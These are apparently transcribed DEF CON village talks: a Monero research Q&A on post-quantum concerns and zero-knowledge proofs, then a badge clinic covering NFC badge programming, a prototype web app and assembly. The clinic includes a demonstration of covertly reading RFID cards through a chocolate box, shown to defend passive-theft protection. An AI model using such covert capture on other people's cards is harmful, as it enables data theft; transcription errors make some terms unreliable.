recipient wallet address, just kind of with no external information? Or if you, for example, had a candidate list of possible recipients that you think it might be, because maybe you have a hunch or some other external information, other ways that you could go and basically check those to determine which it would be. And again, the address space in Monero is like the possible wallet address space in Monero is unfathomably huge. And a quantum computer doesn't just mean like, can do everything fast automatically. There's particular algorithms that we know that can be used against things like the discrete log problem and stuff. So even if you had a hypothetical quantum computer saying, well, it couldn't just go through all possible addresses and see which it is and figure out what recipients is linked to what transaction, that's likely not going to be directly possible. But the question of, what could such a computer do if it had like a small known list of possible addresses? So questions like that, I think, are still kind of up in the air and are part of the subject of the research that they're working on. And I do know that they're also looking at kind of what current directions in my protocol development take that could more efficiently, I guess, work on trying to like mitigate the effects of a future quantum computer. I guess one problem with a lot of algorithms and constructions that are conjectured to be post-quantum secure is efficiency. They often tend to be much more inefficient than I guess would be reasonable to have on chain. Right now, if like post-quantum signatures, for example, can get pretty large. And there have been some ideas for how to do some constructions like linkable ring signatures even, but they're very large. And even if you were to integrate them into the protocol, you still deal with today's computers that still have to store things and do a lot of processing. And if it gets to be too large of a transaction that's too slow, no one's going to use it. So, ideally, we'd like to migrate the protocol immediately to something that's conjectured to be post-quantum secure, but there's a lot of parts of the protocol that it's really uncertain if there's anything at this point that's efficient enough. I mean, research in this area is always ongoing. So obviously, what's the state of the art today is almost certainly not going to be even close to what the state of the art is in 10 years, 20 years, further down the line, where maybe we have a better understanding of the likelihood of seeing a practical quantum computer. So I think one thing that they're trying to do, and I don't want to speak from them, but just my understanding of the work that they're doing is to look at what are at least some directions in research that might give us an indication about what could be efficient down the road for protocol improvements. I mean, I guess the general thing is like, to some extent, like in the age of post-quantum computers, it's like a lot of the internet's kind of screwed in terms of security. So I mean, like Monero would be, at least to some degree, not immune to this, the extent of which different parts of the, I guess, previous chain's history could be known, I think the exact nature of that is what they're trying to determine now. It's really interesting work. But not you think that it's going to be applicable in your lifetime or the lifetime of people you care about. I think that's also very much kind of a contentious issue right now. I don't think that there's really universal agreement on when, if ever, folks might end up seeing a practical quantum computer that would affect projects that they use. And I'm not even close to an expert enough in the area to be able to even hypothesize. Yeah, I got it. So, switching gears, what research have you seen outside of what you've specifically done for Monero, I would say, that has been not necessarily useful, but just really interesting and really surprising? I would say, I think just like the extensive work that's been done on general zero-knowledge proven systems, I think is really cool. So, I mean, right now we use very specific zero-knowledge proven systems in different projects for different purposes. I mean, bulletproof, for example, is a zero-knowledge proven system that does like one particular thing involving Peterson commitments really well. However, like, that's just one application. There's kind of a variant form of bulletproof that you can use to take different algebraic statements, kind of mess them into this particular circuit format, and then build a proof over the circuit arrangement in order to prove that you know, I guess, like all the witness that ends up satisfying the circuit without revealing what that wins is. And that's kind of the general form of like a general zero-knowledge proven system. And so if you have a protocol that you really want to implement, you can put it into this form, you can put it into this form and do this kind of representation, then there's always different tools that you can use right now to prove things about statements relating to this language that you built. So bulletproofs can do that. The different proven systems that are used, you know, and stuff like the C-cache protocols can do that. There's a lot of stuff involving C-case starts. And, you know, there's a whole host of really interesting research on how to do this and what the different trade-offs are. And like I said before, like kind of the, I would say the holy grail for this is trust-free, small, and efficient to generate and verify proofs. And ideally also stuff involving things like batching that lets you kind of amortize the cost of verification over multiple proof verifications. Like just the fact that there's so much fascinating work going on relating to this is really interesting. And unfortunately, none of it that I've seen, I think kind of applies directly to the Nero protocol based on what folks want from it right now. Now, right now the whole trust thing seems to be a pretty big second point. You know, like I said, you know, for users who decide that, you know, they need a protocol that does more than what Monero can offer, like you probably at this point are gonna have to sacrifice that whole, you know, where is the trust lie question. But at the same time, the fact that the research is ongoing and has undergone so much improvement over a pretty short period of time, I think speaks really highly to where that area of research is gonna go in the future. So, I mean, I think it would be great to be able to move to a general idealized future zero knowledge proving system, you know, that lets us build really cool protocols that give us everything we want. Something that's not today, hopefully it's not too far off. There has been a lot of work in that area. It's been shocking. Yeah, and to be clear, like I'm really glad that other projects are doing research in that and, you know, putting that kind of stuff in practice, like as with all projects, including Monero, like I think it's important to talk about limitations and trade-offs, like if you tried to do things like this, you're breaking Monero, but it's still good that, you know, those different kinds of applications are also furthering more research. Sorry. I'm also helping some other later speakers come through. Okay, so you have another five minutes. There aren't any other questions that have come in, sadly, just the two from Andreas. So thank you, Andreas, for answering those questions. I really appreciate them. No one else came to the office hours. They're true office hours. No, that's okay. No, I mean, it's good to kind of just recap, like how stuff has gone and hypothesizes to where it might go. Research is interesting, you know, you never know what's going to come up, what's going to work, what's not going to work. I think the upgrade in October is going to be exciting because, you know, Bulletproof was, I think, a cool example of something where transactions got smaller and faster and there were really no big trade-offs that folks had to consider. And I think CL side is another example where, you know, the transactions get smaller, they go faster, not to the extent that Bulletproof did, but, and there's not really any security trade-offs. You know, if anything, working to CL side helped to kind of improve the way that we understand linkable ring signature security models, you know. So if anything, like, I feel like there's more confidence now about the security of the setup that we're going to have. So if anything, it's not really a trade-off, it's just, you know, kind of an increasing stack of benefits. You're saying that it would be weird a little bit with whatever comes next, because with RingCT, for example, it was an absolutely necessary change to get to hide the amounts of transactions and all the other benefits came with them. And I think the issues with Denominated Monero were not, they still continue to not be well documented and I think like a very clear way. We know they're bad, but also, I don't think we've had many research papers yet showing how bad they were. Oh, I mean, the early Monero chain is, you know, a fantastic source of material for analysis. You know, I mean, it's well understood that the effects of, you know, a lot of optionality in protocol has always been problematic. You know, a huge number of early transactions, you know, were effectively, I would say, denonomized in the sense of, like, ring-based signer ambiguity, you know, not, again, not based on wallet addresses or anything. But, and I think that that's kind of still influences work that goes on today. There's still parts of the protocol that have some optionality in them. And, you know, it's, you know, you can argue that it's good to have some flexibility in the protocol to allow for alternative use cases that you might not anticipate, but at the same time, like a lot of the work that especially folks like Ismus and his group have done has shown that the optionality, you know, can lead to fingerprinting if you're not using standard software or using service that does something in a strange way. And I think that a lot of folks are coming around to a better appreciation of the fact that limiting the protocol to, you know, improve uniformity and decreased fingerprinting is very much like a one-sided, increasingly lopsided argument toward, you know, limiting the protocol. And there's still, like there's still things to do in terms of that. And I think the more that we understand about some of the early protocol decisions and how that optionality was bad, I think the more that that can influence better decisions going forward, you know, like the protocol will always have like the old chains to deal with. And I think the best to do, best thing we can do is try to make the decisions going forward to, you know, improve uniformity that can decrease risks and improve safety. Understood. Andreas asked the last question here. Are there any projects working on voting based in Monero? I know like that one Italian government wrote up that one thing about how they maybe were considered. Yeah, that was a political party, right? Yeah, it was. You know what I'm thinking? Yeah, I don't know if that ever actually got implemented. I don't think it did either. Voting is, I mean, I'm by no means an expert on voting, but everything that I know, and I mean, folks who do different villages at DEF CON involving voting probably know way more than I do that like chronic voting is tricky. And if you think you found out all the ways it could go wrong, like they will always surprise you. So I don't know. I mean, I thought it was cool to see in the original LSAT paper an application to voting just kind of as a, like a fun academic thought experiment. And who knows, you know, it's presumably something involving, you know, good sign or ambiguous proofs going forward, you know, might be beneficial. You know, who knows? You need it for voting, but, you know, I don't think that like LSAT or CLSAG would be the thing to use. I mean, there's enough efficiency problems that, you know, trying to scale that out to the, because again, like the whole idea was that you basically have like all the different possible voting entities as like part of a ring or the entirety of the ring. Like that isn't going to scale reasonably well. And you know, the trust model is so much different for voting that, you know, you could probably get away with something that ends up trading certain kinds of trust for, yeah, I don't know, maybe it's trading that kind of trust for a better efficiency. It's, I haven't thought about this in nearly enough people will speak well to it. So just keep rambling. Yeah, understood. Okay, well, that's the time that we have. Thank you so much, Rangnother. If people want to follow Minero Research Lab, there's always the Minero-Research-Lab channel. Surrounding is always there, of course, 24-7s manning this. Yeah, there's definitely the IRC channel. And the folks don't want to be on IRC, you know, posting questions in our Minero, there's a lot of folks there who are good at research and development who can answer. On the Minero Projects meta repo, on the issues there, you can see when all the meetings are and logs from those meetings are always posted as well after the fact. So folks want to see like what people have been talking about. Yeah, and everyone's walking into the meetings if they happen to have anything that they think is interesting or useful research, the group might like to see. Yeah, a lot of great contributors, not just me by any means, a lot of really great researchers and folks who are interested in protocol improvements and, you know, improving privacy in the digital assets space. So thanks to all the other contributors. Well, thank you so much, Rangnother, for joining us again. We...
|
Ever wanted to have one of your Monero or cryptography related questions answered by the Monero Research Lab? Ask away!
|
10.5446/50651 (DOI)
|
Okay, so we're starting on time. And this is, let's see if I can do this, multiple cameras. So this is the, can you guess, in this hour? This is the badge clinic. You almost can read that. So what will we talk about in this hour? We'll talk about badges, these things here. Yeah, so we'll probably see what they can, what we can do with this year's badge because it's kind of a storage device, so we can use it for backup and some other interesting things. Because it's an office hour, there is no set agenda. So we'll probably jump around a bit from different topics. And I will watch the, keep my eyes on the general text and the office text channels in case, in case there are some questions. Okay, so I guess you can see that this year's badge looks a little different than the last year's badge. They're about the same size. This year we have no LEDs and no power supply. There's no battery inside this year. In place of that, we have a fine leather finish on the back with a plastic enclosure and a full color front overlay. And I'm just curious if audio is okay. I don't know which channel to type to. There's all these channels. Okay, so I'm not going to make any changes unless somebody tells me. So one of the things you can see in this year's badge, even though it does have a front overlay that usually covers all of the parts with color plastic, this PET. So instead of seeing this, which is a PCB, you see this, which is a cover, a front overlay, full color printed. And in order to see these very small chips, which we thought would be interesting for all of the hardware hackers among us, we put in these transparent windows. All right, so let's take a look under the microscope at these transparent windows. Because I'm curious as well what this looks like. So this is the raw PCB with a EEPROM integrated circuit on top there, soldered in. And when we take a look at the color overlay, okay, this is going to need focusing and less illumination. Yeah, you can't see too well, can you? I guess because the light needs to be just right. Let's turn the light on again. Okay, so my experiment didn't work that well, but these are the EEPROMs that are storing our data this year. All right, so take a look at the channels and it seems that video and audio is okay. So we'll do a quick demonstration on how we can write to these. Storage locations. All right, so that's the, that's with and without the front overlay. And to write to this, the antenna is on the back. So we're going to need to align the antenna from the back with a reader device, which typically is a smartphone. All right, in order to use the radio to be able to use NFC, you have to turn the phone on and it has to be at some accessible screen for the users, right? So it can't be turned off. That's the first thing you need to do in order to use the badge over radio. The next thing you have to ensure that the NFC circuit is turned on. And that's right here. I can turn it off. And you need to have that turned on. All right. So those are the two things that you need. And after that, if you have nothing else happening, aside from, aside from what do we have? We have discord and the Chrome browser running on my phone. So something should happen if I have programmed something to this device and I align the antenna of the badge device to the phone. So I'm going to push the middle button there. And it brings up a web browser. That's telling me that the data stored on this button, which I pushed, is a URL. And in case you're curious, this is what the URL is on all of the middle buttons. All right. So that's reading data off of the device, off of the badge. This here is an electronic badge. Without really doing anything at all. This is right out of the box. What does the box look like? Looks like this. I don't know if this is so interesting, but we'll do the unboxing. So you get a, so actually this is a wrong manual for this box, but you have this excellent manual by Andres. And in some part, I discovered this just on my own. Let's see if we can. In fact, on the printed manual, his name isn't on your, oh yes, it is. In fact, there it is. So it's not so, so it's not so anonymous. I'm glad that he put his name on there. I thought he hadn't. So that comes in the box. Obviously, the different parts for a do-it-yourself model. You have to put it yourself together. You have to do it yourself, put it together. So the parts that do come assembled are all of the very difficult things. That's these dome switches, which if you get three of them and you lose one, then you don't have enough. If you don't lose all three, you still have to align them perfectly well over the circuits and then place tape on top without anything moving more than a half millimeter. So it's just kind of messy and uncomfortable. On top of everything else, we knew that we would have to preassemble some of the parts anyway, because these E-Proms, which we have already seen under the microscope, they're only two by three millimeters wide and they're one half millimeter tall also. So they're very, very small. That's why we're preassembling at least some of the parts which come in the do-it-yourself kit. All right. So that's what comes in the box. And after you take that out, you have something like this. You put it together, put the leather on the back and the color overlay on the front. And then you can start programming and doing just the same thing that I showed before. I will do that just once more in case you didn't completely see it. This time, there's nothing on the front. This time, I'm going to show the action from the back. I'm going to align it over the antenna. I'm going to push down. Did you hear that? So that's how it sounds. And when I look at the front, well, it opened a web browser. Now I've got a whole bunch of web browsers on here. Yeah, okay. So that's the reading right out of the box. Because we did pre-program some of these identifiers onto these devices. There are three E-proms. And on each E-prom, you have a variety of different slots, depending on how much data, because they do have different capacities. These three E-proms, the first two are 512 bytes, and the last one is 8 kilobytes. So depending on how much is there, you can do quite a lot of things. In fact, let's try using this program called NFC Tools. And I'm going to add several records. I'll try to do this very fast. Let's do Monero Village. Oops. Monero Village. God, I'm not spelling too well today. All right, we've got Monero Village. I'll put another URL on there for a pop quiz later on. Monero Devices. We'll put a piece of text. We'll say this is, we'll just say DEF CON. DEF CON 28, safe mode. Do you like that? Okay, so we have some text. What else should we put on there? Somebody give me an idea. Here, take a look at all of these things. I'll help you choose. Quite a lot of different types of information, isn't it? Each one of these conforms with the NDEF standard. So that's what goes on NFC data storage. Every single one has a MIME type, which it's hiding from you because it's not a comfortable way to store information. It just tells you, okay, an address, and there's a MIME type associated with this. So let's just say Iceland. That's a place, isn't it? I think so. All right. So that's a place. We'll add another one. We'll add a file link. I don't know how. I've never done file link. I don't know how that works. So let's do application. What's an easy one here? Email is really easy. We can do email. We can go at Monero devices. And object. Oh, okay. It seems that that should say subject, shouldn't it? Dumb subject. I don't know why it says object there. And here we'll just type hello world. So we're putting an entire email, the headers in the body. Hello email, I guess. So we've got all of these different pieces of data. Do you folks see that? I mean, I could keep going, right? What's more options? So I could keep going and we would have 20, 30, 50 pieces of data here. And we can rearrange them. And what I wanted to show is that there are two URLs. So which one do you think will open a website? I mean, it's going to open a website if I write this to a village badge and then let's do that now. Let's write. It's an outside approach. NFC tag, do you see that? This is all quite self-evident, I think. So I'll turn the phone over. I'll put a line the badge onto the phones antenna on the back. This time I will use the star button. Shall I do that? All right. So it's saying approach NFC tag and now I'm going to click on the star. All right. Maybe you heard that and it does say write complete. So what will happen now? If I close this application, do I want to close this? Not really. Let's see what happens if I don't close it. So we're at the home screen, I suppose you call this. And I will, instead of clicking the second button, the moon there, I will click the star. So it does bring up a website, Monero village.org. Oh, I think it's, I think, I didn't use encryption. I just wrote HTTP, I think. Is that what it's complaining about? No, narrow village. Rerar, what's wrong with this? I don't understand the problem. Okay, so here is a your eye. Maybe it's because the WWW is not correct. The point is that the web browser opened. Certificate date is invalid. Okay, so it seems that we have some problem with our website. It doesn't matter too much. What's important is that this badge opened automatically a website that we have programmed in by ourself onto this device. Right. We can try this again. Looking back at the list of pieces of data. What happens now if I rearrange this, if this your eye replaces the first one, let's do that now, shall we? So I'm going to use the star again, but this is a different badge. So that on the back there. And I will click. Why isn't it working now? Could it be? Did another? So this is not working, is it? Let's try this one again. Let's try this one. So this time it worked. Not sure what happened with that other badge. And the test is to see what happens now when I use that one button and it will bring up a website. I am. Okay. I'm going to use the correct website now that we got before. So that's kind of the workflow of programming these and using them for data, data storage. Monerovillage.com. Is that what AJ is saying? I thought it was.org. Have I been typing the wrong thing? All right, so AJ, sorry, I have to do this. This is my screen and it looks quite good. Oh, but okay, that's German. I'm sorry about that. This, now you're right. So I've been typing org all these days and you're saying that I have to type calm there? Then do I get a certificate? It still says it's not secure. All right, so this is not the right time to troubleshoot and debug the website. But we did, however, we did just have a demonstration of how to program and use these badges on a day-to-day basis. So I can show you our application or homepage, I suppose you could call it for this year's Village Badge. How do I do that? I have to go back to this web browser. And because we were spending most of our time on the hardware, the software interface or the website, in other words, some of the parts are working and others aren't. So this is bobmonerodevices.com. This is with a good certificate. Okay, that's German, but it says the certificate is fine. So we have two different menus here, one at the top that can toggle left to right and one that goes up to down. And we've got some actions. I mean, this is a standard web application, right? We're not trying to make a whole operating system here. But the traditional, the typical things like the about page, I guess this is good enough. It has all the information that you might expect. We have the welcome page there, which gives you an idea that you can use the badge on Android or iOS, because those two devices are smartphones with NFC circuits inside, and that NFC tools is the application that works. There's a few other things that work as well, like the game. I'll just click on game there on the left. It takes a bit to load. So we teamed up, Monero Village teamed up with the Rogues Village and a few others as well. And they programmed a game, which works with the badge. I haven't gotten that far myself, but you can see there's a few people who have made it to the end. And the one thing that I don't like, if you just left click on the play button, so there's a cross-side scripting problem, which it's not a problem. It's how the website is intended to work, but it's called Core, C-O-R-S. And what you have to do is click on the right, do a right button click, and then, I mean, you can choose any of these things. I'm just saying, if I choose this, you won't see it. It's going to a different tab. So what I'm going to do is copy the URL and then put it up here to show you what the game looks like. And this is the Rogues Adventure Game. There's a bunch of things to read about it here, but we will just kind of start playing. And although I haven't made it too far, according to our colleagues at the Rogues Village, it's about halfway through that you can use your electronic badge with this game. So I'll just type some random thing here. And so I'm not going to do this too long, but I'd like to give you some idea of how it works. So you can go down the stairs. I think there's something to look at here. Look at fossils. You get the idea, right? So this is kind of fun. Now how do I go backwards? Oh, I can indeed change the tabs. All right, so that's one of the things that is working. Some other easy to implement things are working, like the gallery. I mean, this is not very valuable, but if you're interested in what the red one looks like, there it is. These are the different colors, and you've got the DIY to do it yourself. That's why there's no plastic enclosures, and you've got the different parts that you put together yourself. This is the wonderful user manual that Andres created for us. It's really nice. And this is kind of our experiment with the packaging, which we failed at last year. And this year we did pretty well, but we went overboard with that. So that's the gallery. So we've got a file server where you can download the glossy color user manual, or that, well, it's not glossy. I don't know. They have to take that off. It's not printed on paper when you download it electronically, so there's no gloss or matte finish, okay? But you can get copies of either one. I'm not sure what happens if I click there, if it even works. You see it does work. So there's Andres' design and all of the illustrations, really wonderful work. So I'll go back and you can tell that the file server is working. We've got status, which is kind of halfway accurate. It just says there, its application is undergoing development, which is true. We've got a top 10 FAQ. So I explained already why the playing of the game fails when you click on it, which is, the developers are participating, so none of this is all too exciting. What we actually really want, we start at the beginning here again, what we actually really want is here at the configure. No, I'm sorry, not the configure, but at the onboard. This is where it's going to get exciting, because although it's not fully implemented to actually write the NDEF identifiers and pieces of data over radio, so we want to implement those things here and the way it will work. So you put your name here, any name at all, you could write, you could change the gender and change the geography, you could write you're one of, you're some dead person, you could write I am Alfred Nobel. So Alfred Nobel is no longer with us. What I'm just saying is that you can create a pseudo name here, all right, it's a nickname. After you put that in, you check off the things that you're interested in. So I like IOT, I like Rogues a lot. And well, that's too many maybe I want biohacking as well. I won't be able to get them all on there because I'm programming the very small eProm. So I need to take some off, you get the idea. So I'm just going to be interested in this one round Rogues, Monero and biohacking. Well click on associate me and this is where it starts to not work. So even if I click on there, it's kind of, these are not my choices. Yeah, you can see that this is still in prototype mode. So these are not my choices. But eventually we'll be able to write data or cancel. And it will start waiting for you to attach a badge or put a badge next to the antenna on the phone. If I want to do a factory reset, I can do that as well. And that's how this association and onboarding functionality will work. Once you have your identifiers on the eProms all lined up like you like, you might want red team on the third eProm. You might want biohacking on the second one and crypto privacy on Monero you'll want maybe on the first one, whatever it is. You line these up and you write them to your badge. You can then use the intervillage network. And although this looks okay, it actually does look like it works. So this says here under development, please stay tuned. So it's not working yet. In the end you can connect to the intervillage network by clicking on connect. You can do a ping just to test the network connection. If you need to authenticate, because for example some of the village rooms or channels or topics are protected, maybe they would like to know who walks in through their doors. Then you can authenticate. And if you don't need to, then you just skip that opcode or network code. You can turn on the bridge. I think the bridge will be activated by this command, the safe mode, which basically means we're going to do a proxy from the MQTT network, which is what we're connected to here, to the DEF CON Discord. I mean this is kind of not relevant because they're probably going to turn off the DEF CON Discord tomorrow. So there won't be much time to use it. But that's there just maybe for another day next year. So we can knock on one of the participating villages doors. We can knock on Monero's door. And if we don't get a response, we can knock again. And maybe on the third knock we're automatically allowed to enter. There can be some logic like that. Once we're inside, we can tip using AJ's tip arrow, but one, two, four units. And once we're inside, we can get information about our room. Maybe we're walking in the biohacking room for the first time. And we didn't realize that there is a device program there, medical device program. We'd like to know more about the room that we walked in. We click on info. We can leave the room just as easily with the leave command and disconnect from the network with disconnect. All right, so that's kind of the rundown of the web application, which is under development. If we look at status, it says that clearly, application under development. Okay, anybody who wants to help develop this, let me see how to... So there is a URL to show. I've written it down some other place, but I'll never be able to find it. So I'll just reuse this piece of paper. I'm going OK, AJ. So if you'd like to help to develop all of this web application logic, which is quite challenging, it's just tedious, lots of troubleshooting, firebug, and debugging. You can do a fork of the repository because it's all open source. The repository is found here. So this one is certainly calm. I know that because we don't have org. And we have a certificate. Everything's OK here. SCM stands for source code management. And if you do go there, then you can find all of our source code. Shall we take a look? Or are there questions about something else, some other topic? General text, office text, you don't see questions. So what we'll do, we'll take a look at the source code management system. How do I get back to that? Here it is. Okay. So now we will choose instead of bob. Let's go to SCM, shall we? And the nice thing about SCM is that it takes quite a long, long time to load because it's a very slow virtual server, VPS virtual private server. All right. But in any case, we see that there's something did come up here. So instead of explaining all of these things and clicking through each one, which is very slow process, I'll just go right to apparatus, which is Esperanto for devices. And then we have a list of the different types of devices. Badges is here. And in the list of badges, we should see a few different things. And there is Monero rising. Iron triangle, which is the parent project of this derivative, the Bush of Being. I think I should rename this, but the Bush of Being is the Intervallage Badge. So I just clicked on that. Let's navigate over to where the web application is found. It's under software. So there's a bit of things to read about here. The storyline, hardware, network, it's not up to date, but I think it's good enough explaining a few things. So right here in software, that's because it's obviously not hardware, graphics, and closure or documents. So if we have a web application, it's going to be listed under software. So I click there, we've got the website. So we may see other things here under software. We may have Android, APK, not the APK itself, but the source code that builds the APK and whatever it's called for the Apple. So I'm going to click on website, and then most people who are familiar with websites, you see the traditional CSS, the HTML5 and JavaScript CSS arrangement. So we've got documents. This is where Andres's user manuals are located inside the actual sources. And then we've got a few things. I think Fawned Awesome is in here as well, a few things like that. So here's the index. I don't think anything else is all that interesting. I'll just click on index to see what that looks like. And we're not going to drill down too deep, but this very last level is just kind of maybe interesting for some reason. This is all the source code. Oh, my, and it's just not interesting at all. Okay, so you do have some snippets, and you can navigate through this SCM source code management on your own because it is public site. You can fork, pull, and fetch sources. You can do merge requests. And I certainly hope that you do as well because we could use a help. I mean, there's few of us doing work on this. So that's why we're kind of behind on things like the web application. So AJ says it all is good. I'm happy about that. We have another 20 minutes or so. What should I do now? So yesterday what I said I would demonstrate was the impersonation is going to be a bit difficult, but I said I would demonstrate a passive capture. It's not data theft because these are my own devices. So it's like opening the drawers to your shirt drawer, you know, you're not stealing your shirts when you do that in your own house, right? So that's why I can take my own data and everything is just fine. If you do this without your own data, it's just not okay at all. So what I have here is a very nice box of chocolates. I wish the light was a bit better. I'm going to try to adjust the lights a bit. I'm not sure if that helps. I don't know if that helps. So I've got a nice box of chocolate here. And first thing what I will do is prepare this because I forgot to turn something on. Right. And that's the other camera angle. That's about the size of the box of chocolates. And that's the way a box of chocolate sounds, isn't it? I don't know if you heard that. So either remove this cover, open this up. What do you think is inside? You want to take a guess? No? You don't want to guess? I'll show you. Okay. So that's these chocolates are inside. Now, they're definitely chocolates. Okay. Okay. So I've eaten almost all of them. I'm sorry. I didn't leave any for you. So what do you think will happen? First we put this lid on the chocolate again. And let me just do that. I should have prepared this beforehand. I'm sorry about that. All right. So we've got the box of chocolates. I'm now going to place, let me just do this a different way. I'm going to place a library card on the box of chocolates. The contrast is very bad because it's a blue library card and blue chocolates. I'm sorry about that. I couldn't change the colors quickly. All right. So here's a library card and just going to drop that on there. Not sure if you heard that. If you didn't, I will put my microphone next to the box of chocolates. So I think you heard it that time. What I just did is capture data off of my library card. All right. So here I'm looking at the data now because if this wasn't my own data and if it was a credit card instead of your library card or say a passport, I'm not sure what types of cards and devices have this kind of circuit inside, but this one as we can see is a My Fair. So it's an ISO 14443. This is an RFID standard. And we just captured the data, right? It's the good news is that it's encrypted. You can tell that because it's got an ATQA and an SAK. But the serial number is there and you can certainly see some things, right? So what is this number ISO 14443? Let's just do one more thing. How shall I do this? I'm going to capture the data off of my Intervillage Badge now. And I will demonstrate that it's very difficult to trick your Intervillage Badge in the same manner for one reason because it has passive data theft protection built in. So this is the screen. You can see that it's empty. I'm now going to try to capture the data in the same way and just dropping it on there. It does nothing. It's impossible to capture the data. I'm going to align the antenna. There is no problem. The device is perfectly well aligned on top of the turned on smartphone, which is capturing right now. It's reading. The reason that it does not successfully capture the data passively in this manner would be known as theft is that I have not pushed on one of the three buttons. And once I do that, as long as the screen is still turned on, once I do that, we should hear it capture. So let me go back here. All right. So I think you heard that. It did capture something as I was pushing down on there. Let's see what it captured. So I got all the data off of my Intervillage Badge, that thing. And the good news about that, so it's a different ISO standard. If we want to use the ISO 14443 like the library card was, then I just need to use a different button, right? Because we have 15693 on these two. And the sun is a 14443 standard, which is my fair. So we can basically copy the data off of this library card onto this badge. All right? It is encrypted, which makes it more difficult, but some library cards are not encrypted. So some of the things to understand about that, it did successfully copy the data or capture it, right? If this is a box of chocolates that's unopened, you would not know that this is happening. And you can do this with a number of daily objects like magazines, newspapers, you can embed a reader into a table itself at a coffee shop. I think you understand the point. So today and tomorrow, yesterday and forever, there are people stealing data and we wouldn't know it. And that's what makes it important to have a sense of, not a sense, to have a technical circuit built in which disconnects the antenna when you're not pushing on this. When a human is not pushing on one of the three buttons, this antenna is not connected to the ICs that integrated circuits which are storing the data. And what that means is that it's nearly impossible. It could be possible. It might not be impossible. I just don't want to say that, but it's very difficult. It's very, very difficult to capture data off of these things unless you're pushing on a button. And what I call that is defense of passive data theft. Is that what you call it too? Need money? Are you watching? All right. So we just demonstrated the passive data theft protection. And we demonstrated the writing of information. We demonstrated the passive capture of a library card. We demonstrated the difficulty of copying encrypted information. And we saw a nice chocolate box demonstration. And what else do we have? So there are a variety. What I like to experiment with are these types of transit cards. Quite often they either have a copper smart card integrated circuit or they have an antenna inside. You can't see it then. And here's one, for example, with an antenna inside. How about this? Let's do another test. I will turn on the smartphone again. So we'll get this working again. And remember, it's always very important to have your screen turned on. Otherwise, the NFC circuit, a lot of the radios don't work. So this is an empty screen. There is no data on the screen. We're now going to passively copy data off of a transit card. Shall we do that? So I'll just drop it on there. And if you heard that, it's already too late. If I was not the owner, then I would have just lost the information. So what we have here, this is an interesting memory model. It's a MyFair again. So you would see the 14443. Has a serial number. It has memory information. So this is quite interesting. On the Pro model, it dumps the memory on this one, it doesn't. But in any case, so we just captured the data from a transit card. All right, so that's how that works. What else can we demonstrate? We can take a quick look at what the devices look like from start to finish during the manufacturing. So the manufacturing starts with a etched circuit board like this. Get the light a bit better. The lighting is just not very good. But so I'm not happy about that. And then there's a shadow if I do that. Okay, so this is the PCB or printed circuit board. And if you take a quick look, there are no parts on there. You can see the three different footprints. U1, U2, U3. There's no switches on the switch. SW1, SW2, SW3. So that's how we start. The other side needs to be flush and straight. So we don't have parts on there at all because it needs to be right up against the reader device in some situations. So we begin by populating parts on this side. So I'm going to show a different PCB now. There they are side by side. And the one doesn't have parts. And this one does. Okay, so what does that look like? After we populate the PCB with switches, with e-prons, with integrated circuits, that's what it looks like then. There we go, focused. So we've got the three switches on there. We've got a piece of cap-on tape on top to keep them in place. And then we've got our e-proms, two of which are holding data in NDEF type 4. I'm sorry, NDEF type 5. And the last one, which is this one, U3, is holding data in the format of NDEF type 4. That's my fair one. All right, now the other side is just the same because, like I said before, in some cases we need this antenna to be right up against the reading device. And for this reason, we can't put parts there. And the next step in the procedure to populate or to create these devices and assemble them is to place an overlay on the front and a piece of leather on the back for protection. All right, so what does that look like? The overlays look like this. So that's what it's like when... I'll just use one here. So that's what it looks like when we have placed the overlay, which has an adhesive back on it, peeled the adhesive back on and put the overlays on. And you can see that through the overlay there are transparent windows that show you the parts underneath the small chips. The other side of the badge, because we're going to be... So this is hard to see because it's black, but in this case it's red. This is where we differentiate the colors in the villages. Whenero obviously has an orange one. And the reason that leather is on there, so that when you put this against the phone, that it's not scratching your lens. Okay, so there is a functional purpose for this leather. Most people think that it's decorational. I mean, it does feel good. But it's actually there to protect the lens of your reading device, which is usually a smartphone. All right, so that's the front and the back. And once we do that, all we need to do to finish the device is to put it inside a enclosure frame. The reason this has two stripes is that they come out of the printer like this. It needs supports in between those two protruding pieces of the model. And that's why we put some supports in between. And one problem that we found is that every 10th badge that we assemble, we break the frame on it. So that's one reason we're not enclosing frames with a do-it-yourself models, because it would just be too much of a... We would need to supply two, three, four frames for each badge to make sure to ensure that the person didn't break it. All right, so that frame goes on the edge of the badge, as you can imagine. And it covers part of the leather to keep that on. And the edge is no longer... Well, let me... I mean, this doesn't look good when you don't have that plastic on. You can see the different layers. So that's kind of a decorational thing. I do suppose that if you drop the badge that the plastic frame does help a bit there as well. It's called a protection feature. All right, so that's... I just realized that I forgot to record this. I'm supposed to record... Okay, now it's too late. We're five minutes or 10 minutes away from the end. Okay, I forgot. Sorry. Right, so this is what happens when you fully create the badge. We have some black ones, which are called...the model number is called black matter, black matter monero orange. We've got some attack red, red on the back and on the front. We've got defense blue. The defense blue is quite nice, very translucent. You can see right through the plastic in some areas. This is what's so nice about SLA stereolithography. It's much more difficult to get a FDM or fused deposition modeling process translucent. Anyway, so these are all the colors. I think there's a green one as well. And then we have some unique village colors. Let me show a couple of those. This one belongs to the rogues village. Colors do not...I don't know if maybe I can...I think it's a lighting problem. In any case, this is blue. You can't tell that it's blue. With a white frame. And they chose this because these are the colors of the rogues village. They chose the symbols as well. We got a lot of help from the rogues village. Really appreciate that. Thanks folks at the rogues village. This is the biohacking color scheme that they chose and reserved for their village. Because in biohacking they have black and green. And so as you can imagine, the front is the same on all of these. Translucent green frame. You can really see through that, can't you? And the back is black. So I don't need to go through all of these because there are five or six different ones. But that's kind of how they look. And so with five minutes left, I would just invite questions. And if there are no questions, then we can either finish early or I can maybe look for some more. Oh, I know what I forgot. I wrote this in the description for this presentation. And what I forgot is to show other badge types. So here is a prototype. This is kind of how we were developing before we got far enough to release the design. So we have some wires soldered on there and extra button up here, which is a different tactile strength here. These are 260 grams. And this one up here is only 130, I think. And different parts. These are M24SRLR04. And the back looks very similar. So this is a prototype board. Here is the Monero Rising. This is quite nice. I soldered a header on there for the SAO connection. And basically how these work, it comes with a battery. You turn it on and off on the side here. When you turn it on, it lights up, obviously, because there are a lot of LEDs on here. So let's see what that looks like on the front. Now we'll turn it on. So that flash is a negotiation. It says I've turned on. It's indicating that the badge is ready for action. So there are three capacitive touch buttons on the bottom here. They're not tactile. They're capacitive touch, which means I just lightly put my finger on the middle one to turn it on and off. So now it's on. I have to be careful when I'm using the buttons because they are very sensitive. So pressing them from the back is possible as well. Let's see if I can do that. Okay, it's not so easy as I thought, but if I push the same button again, it turns it off. Understand how that works? Once turns 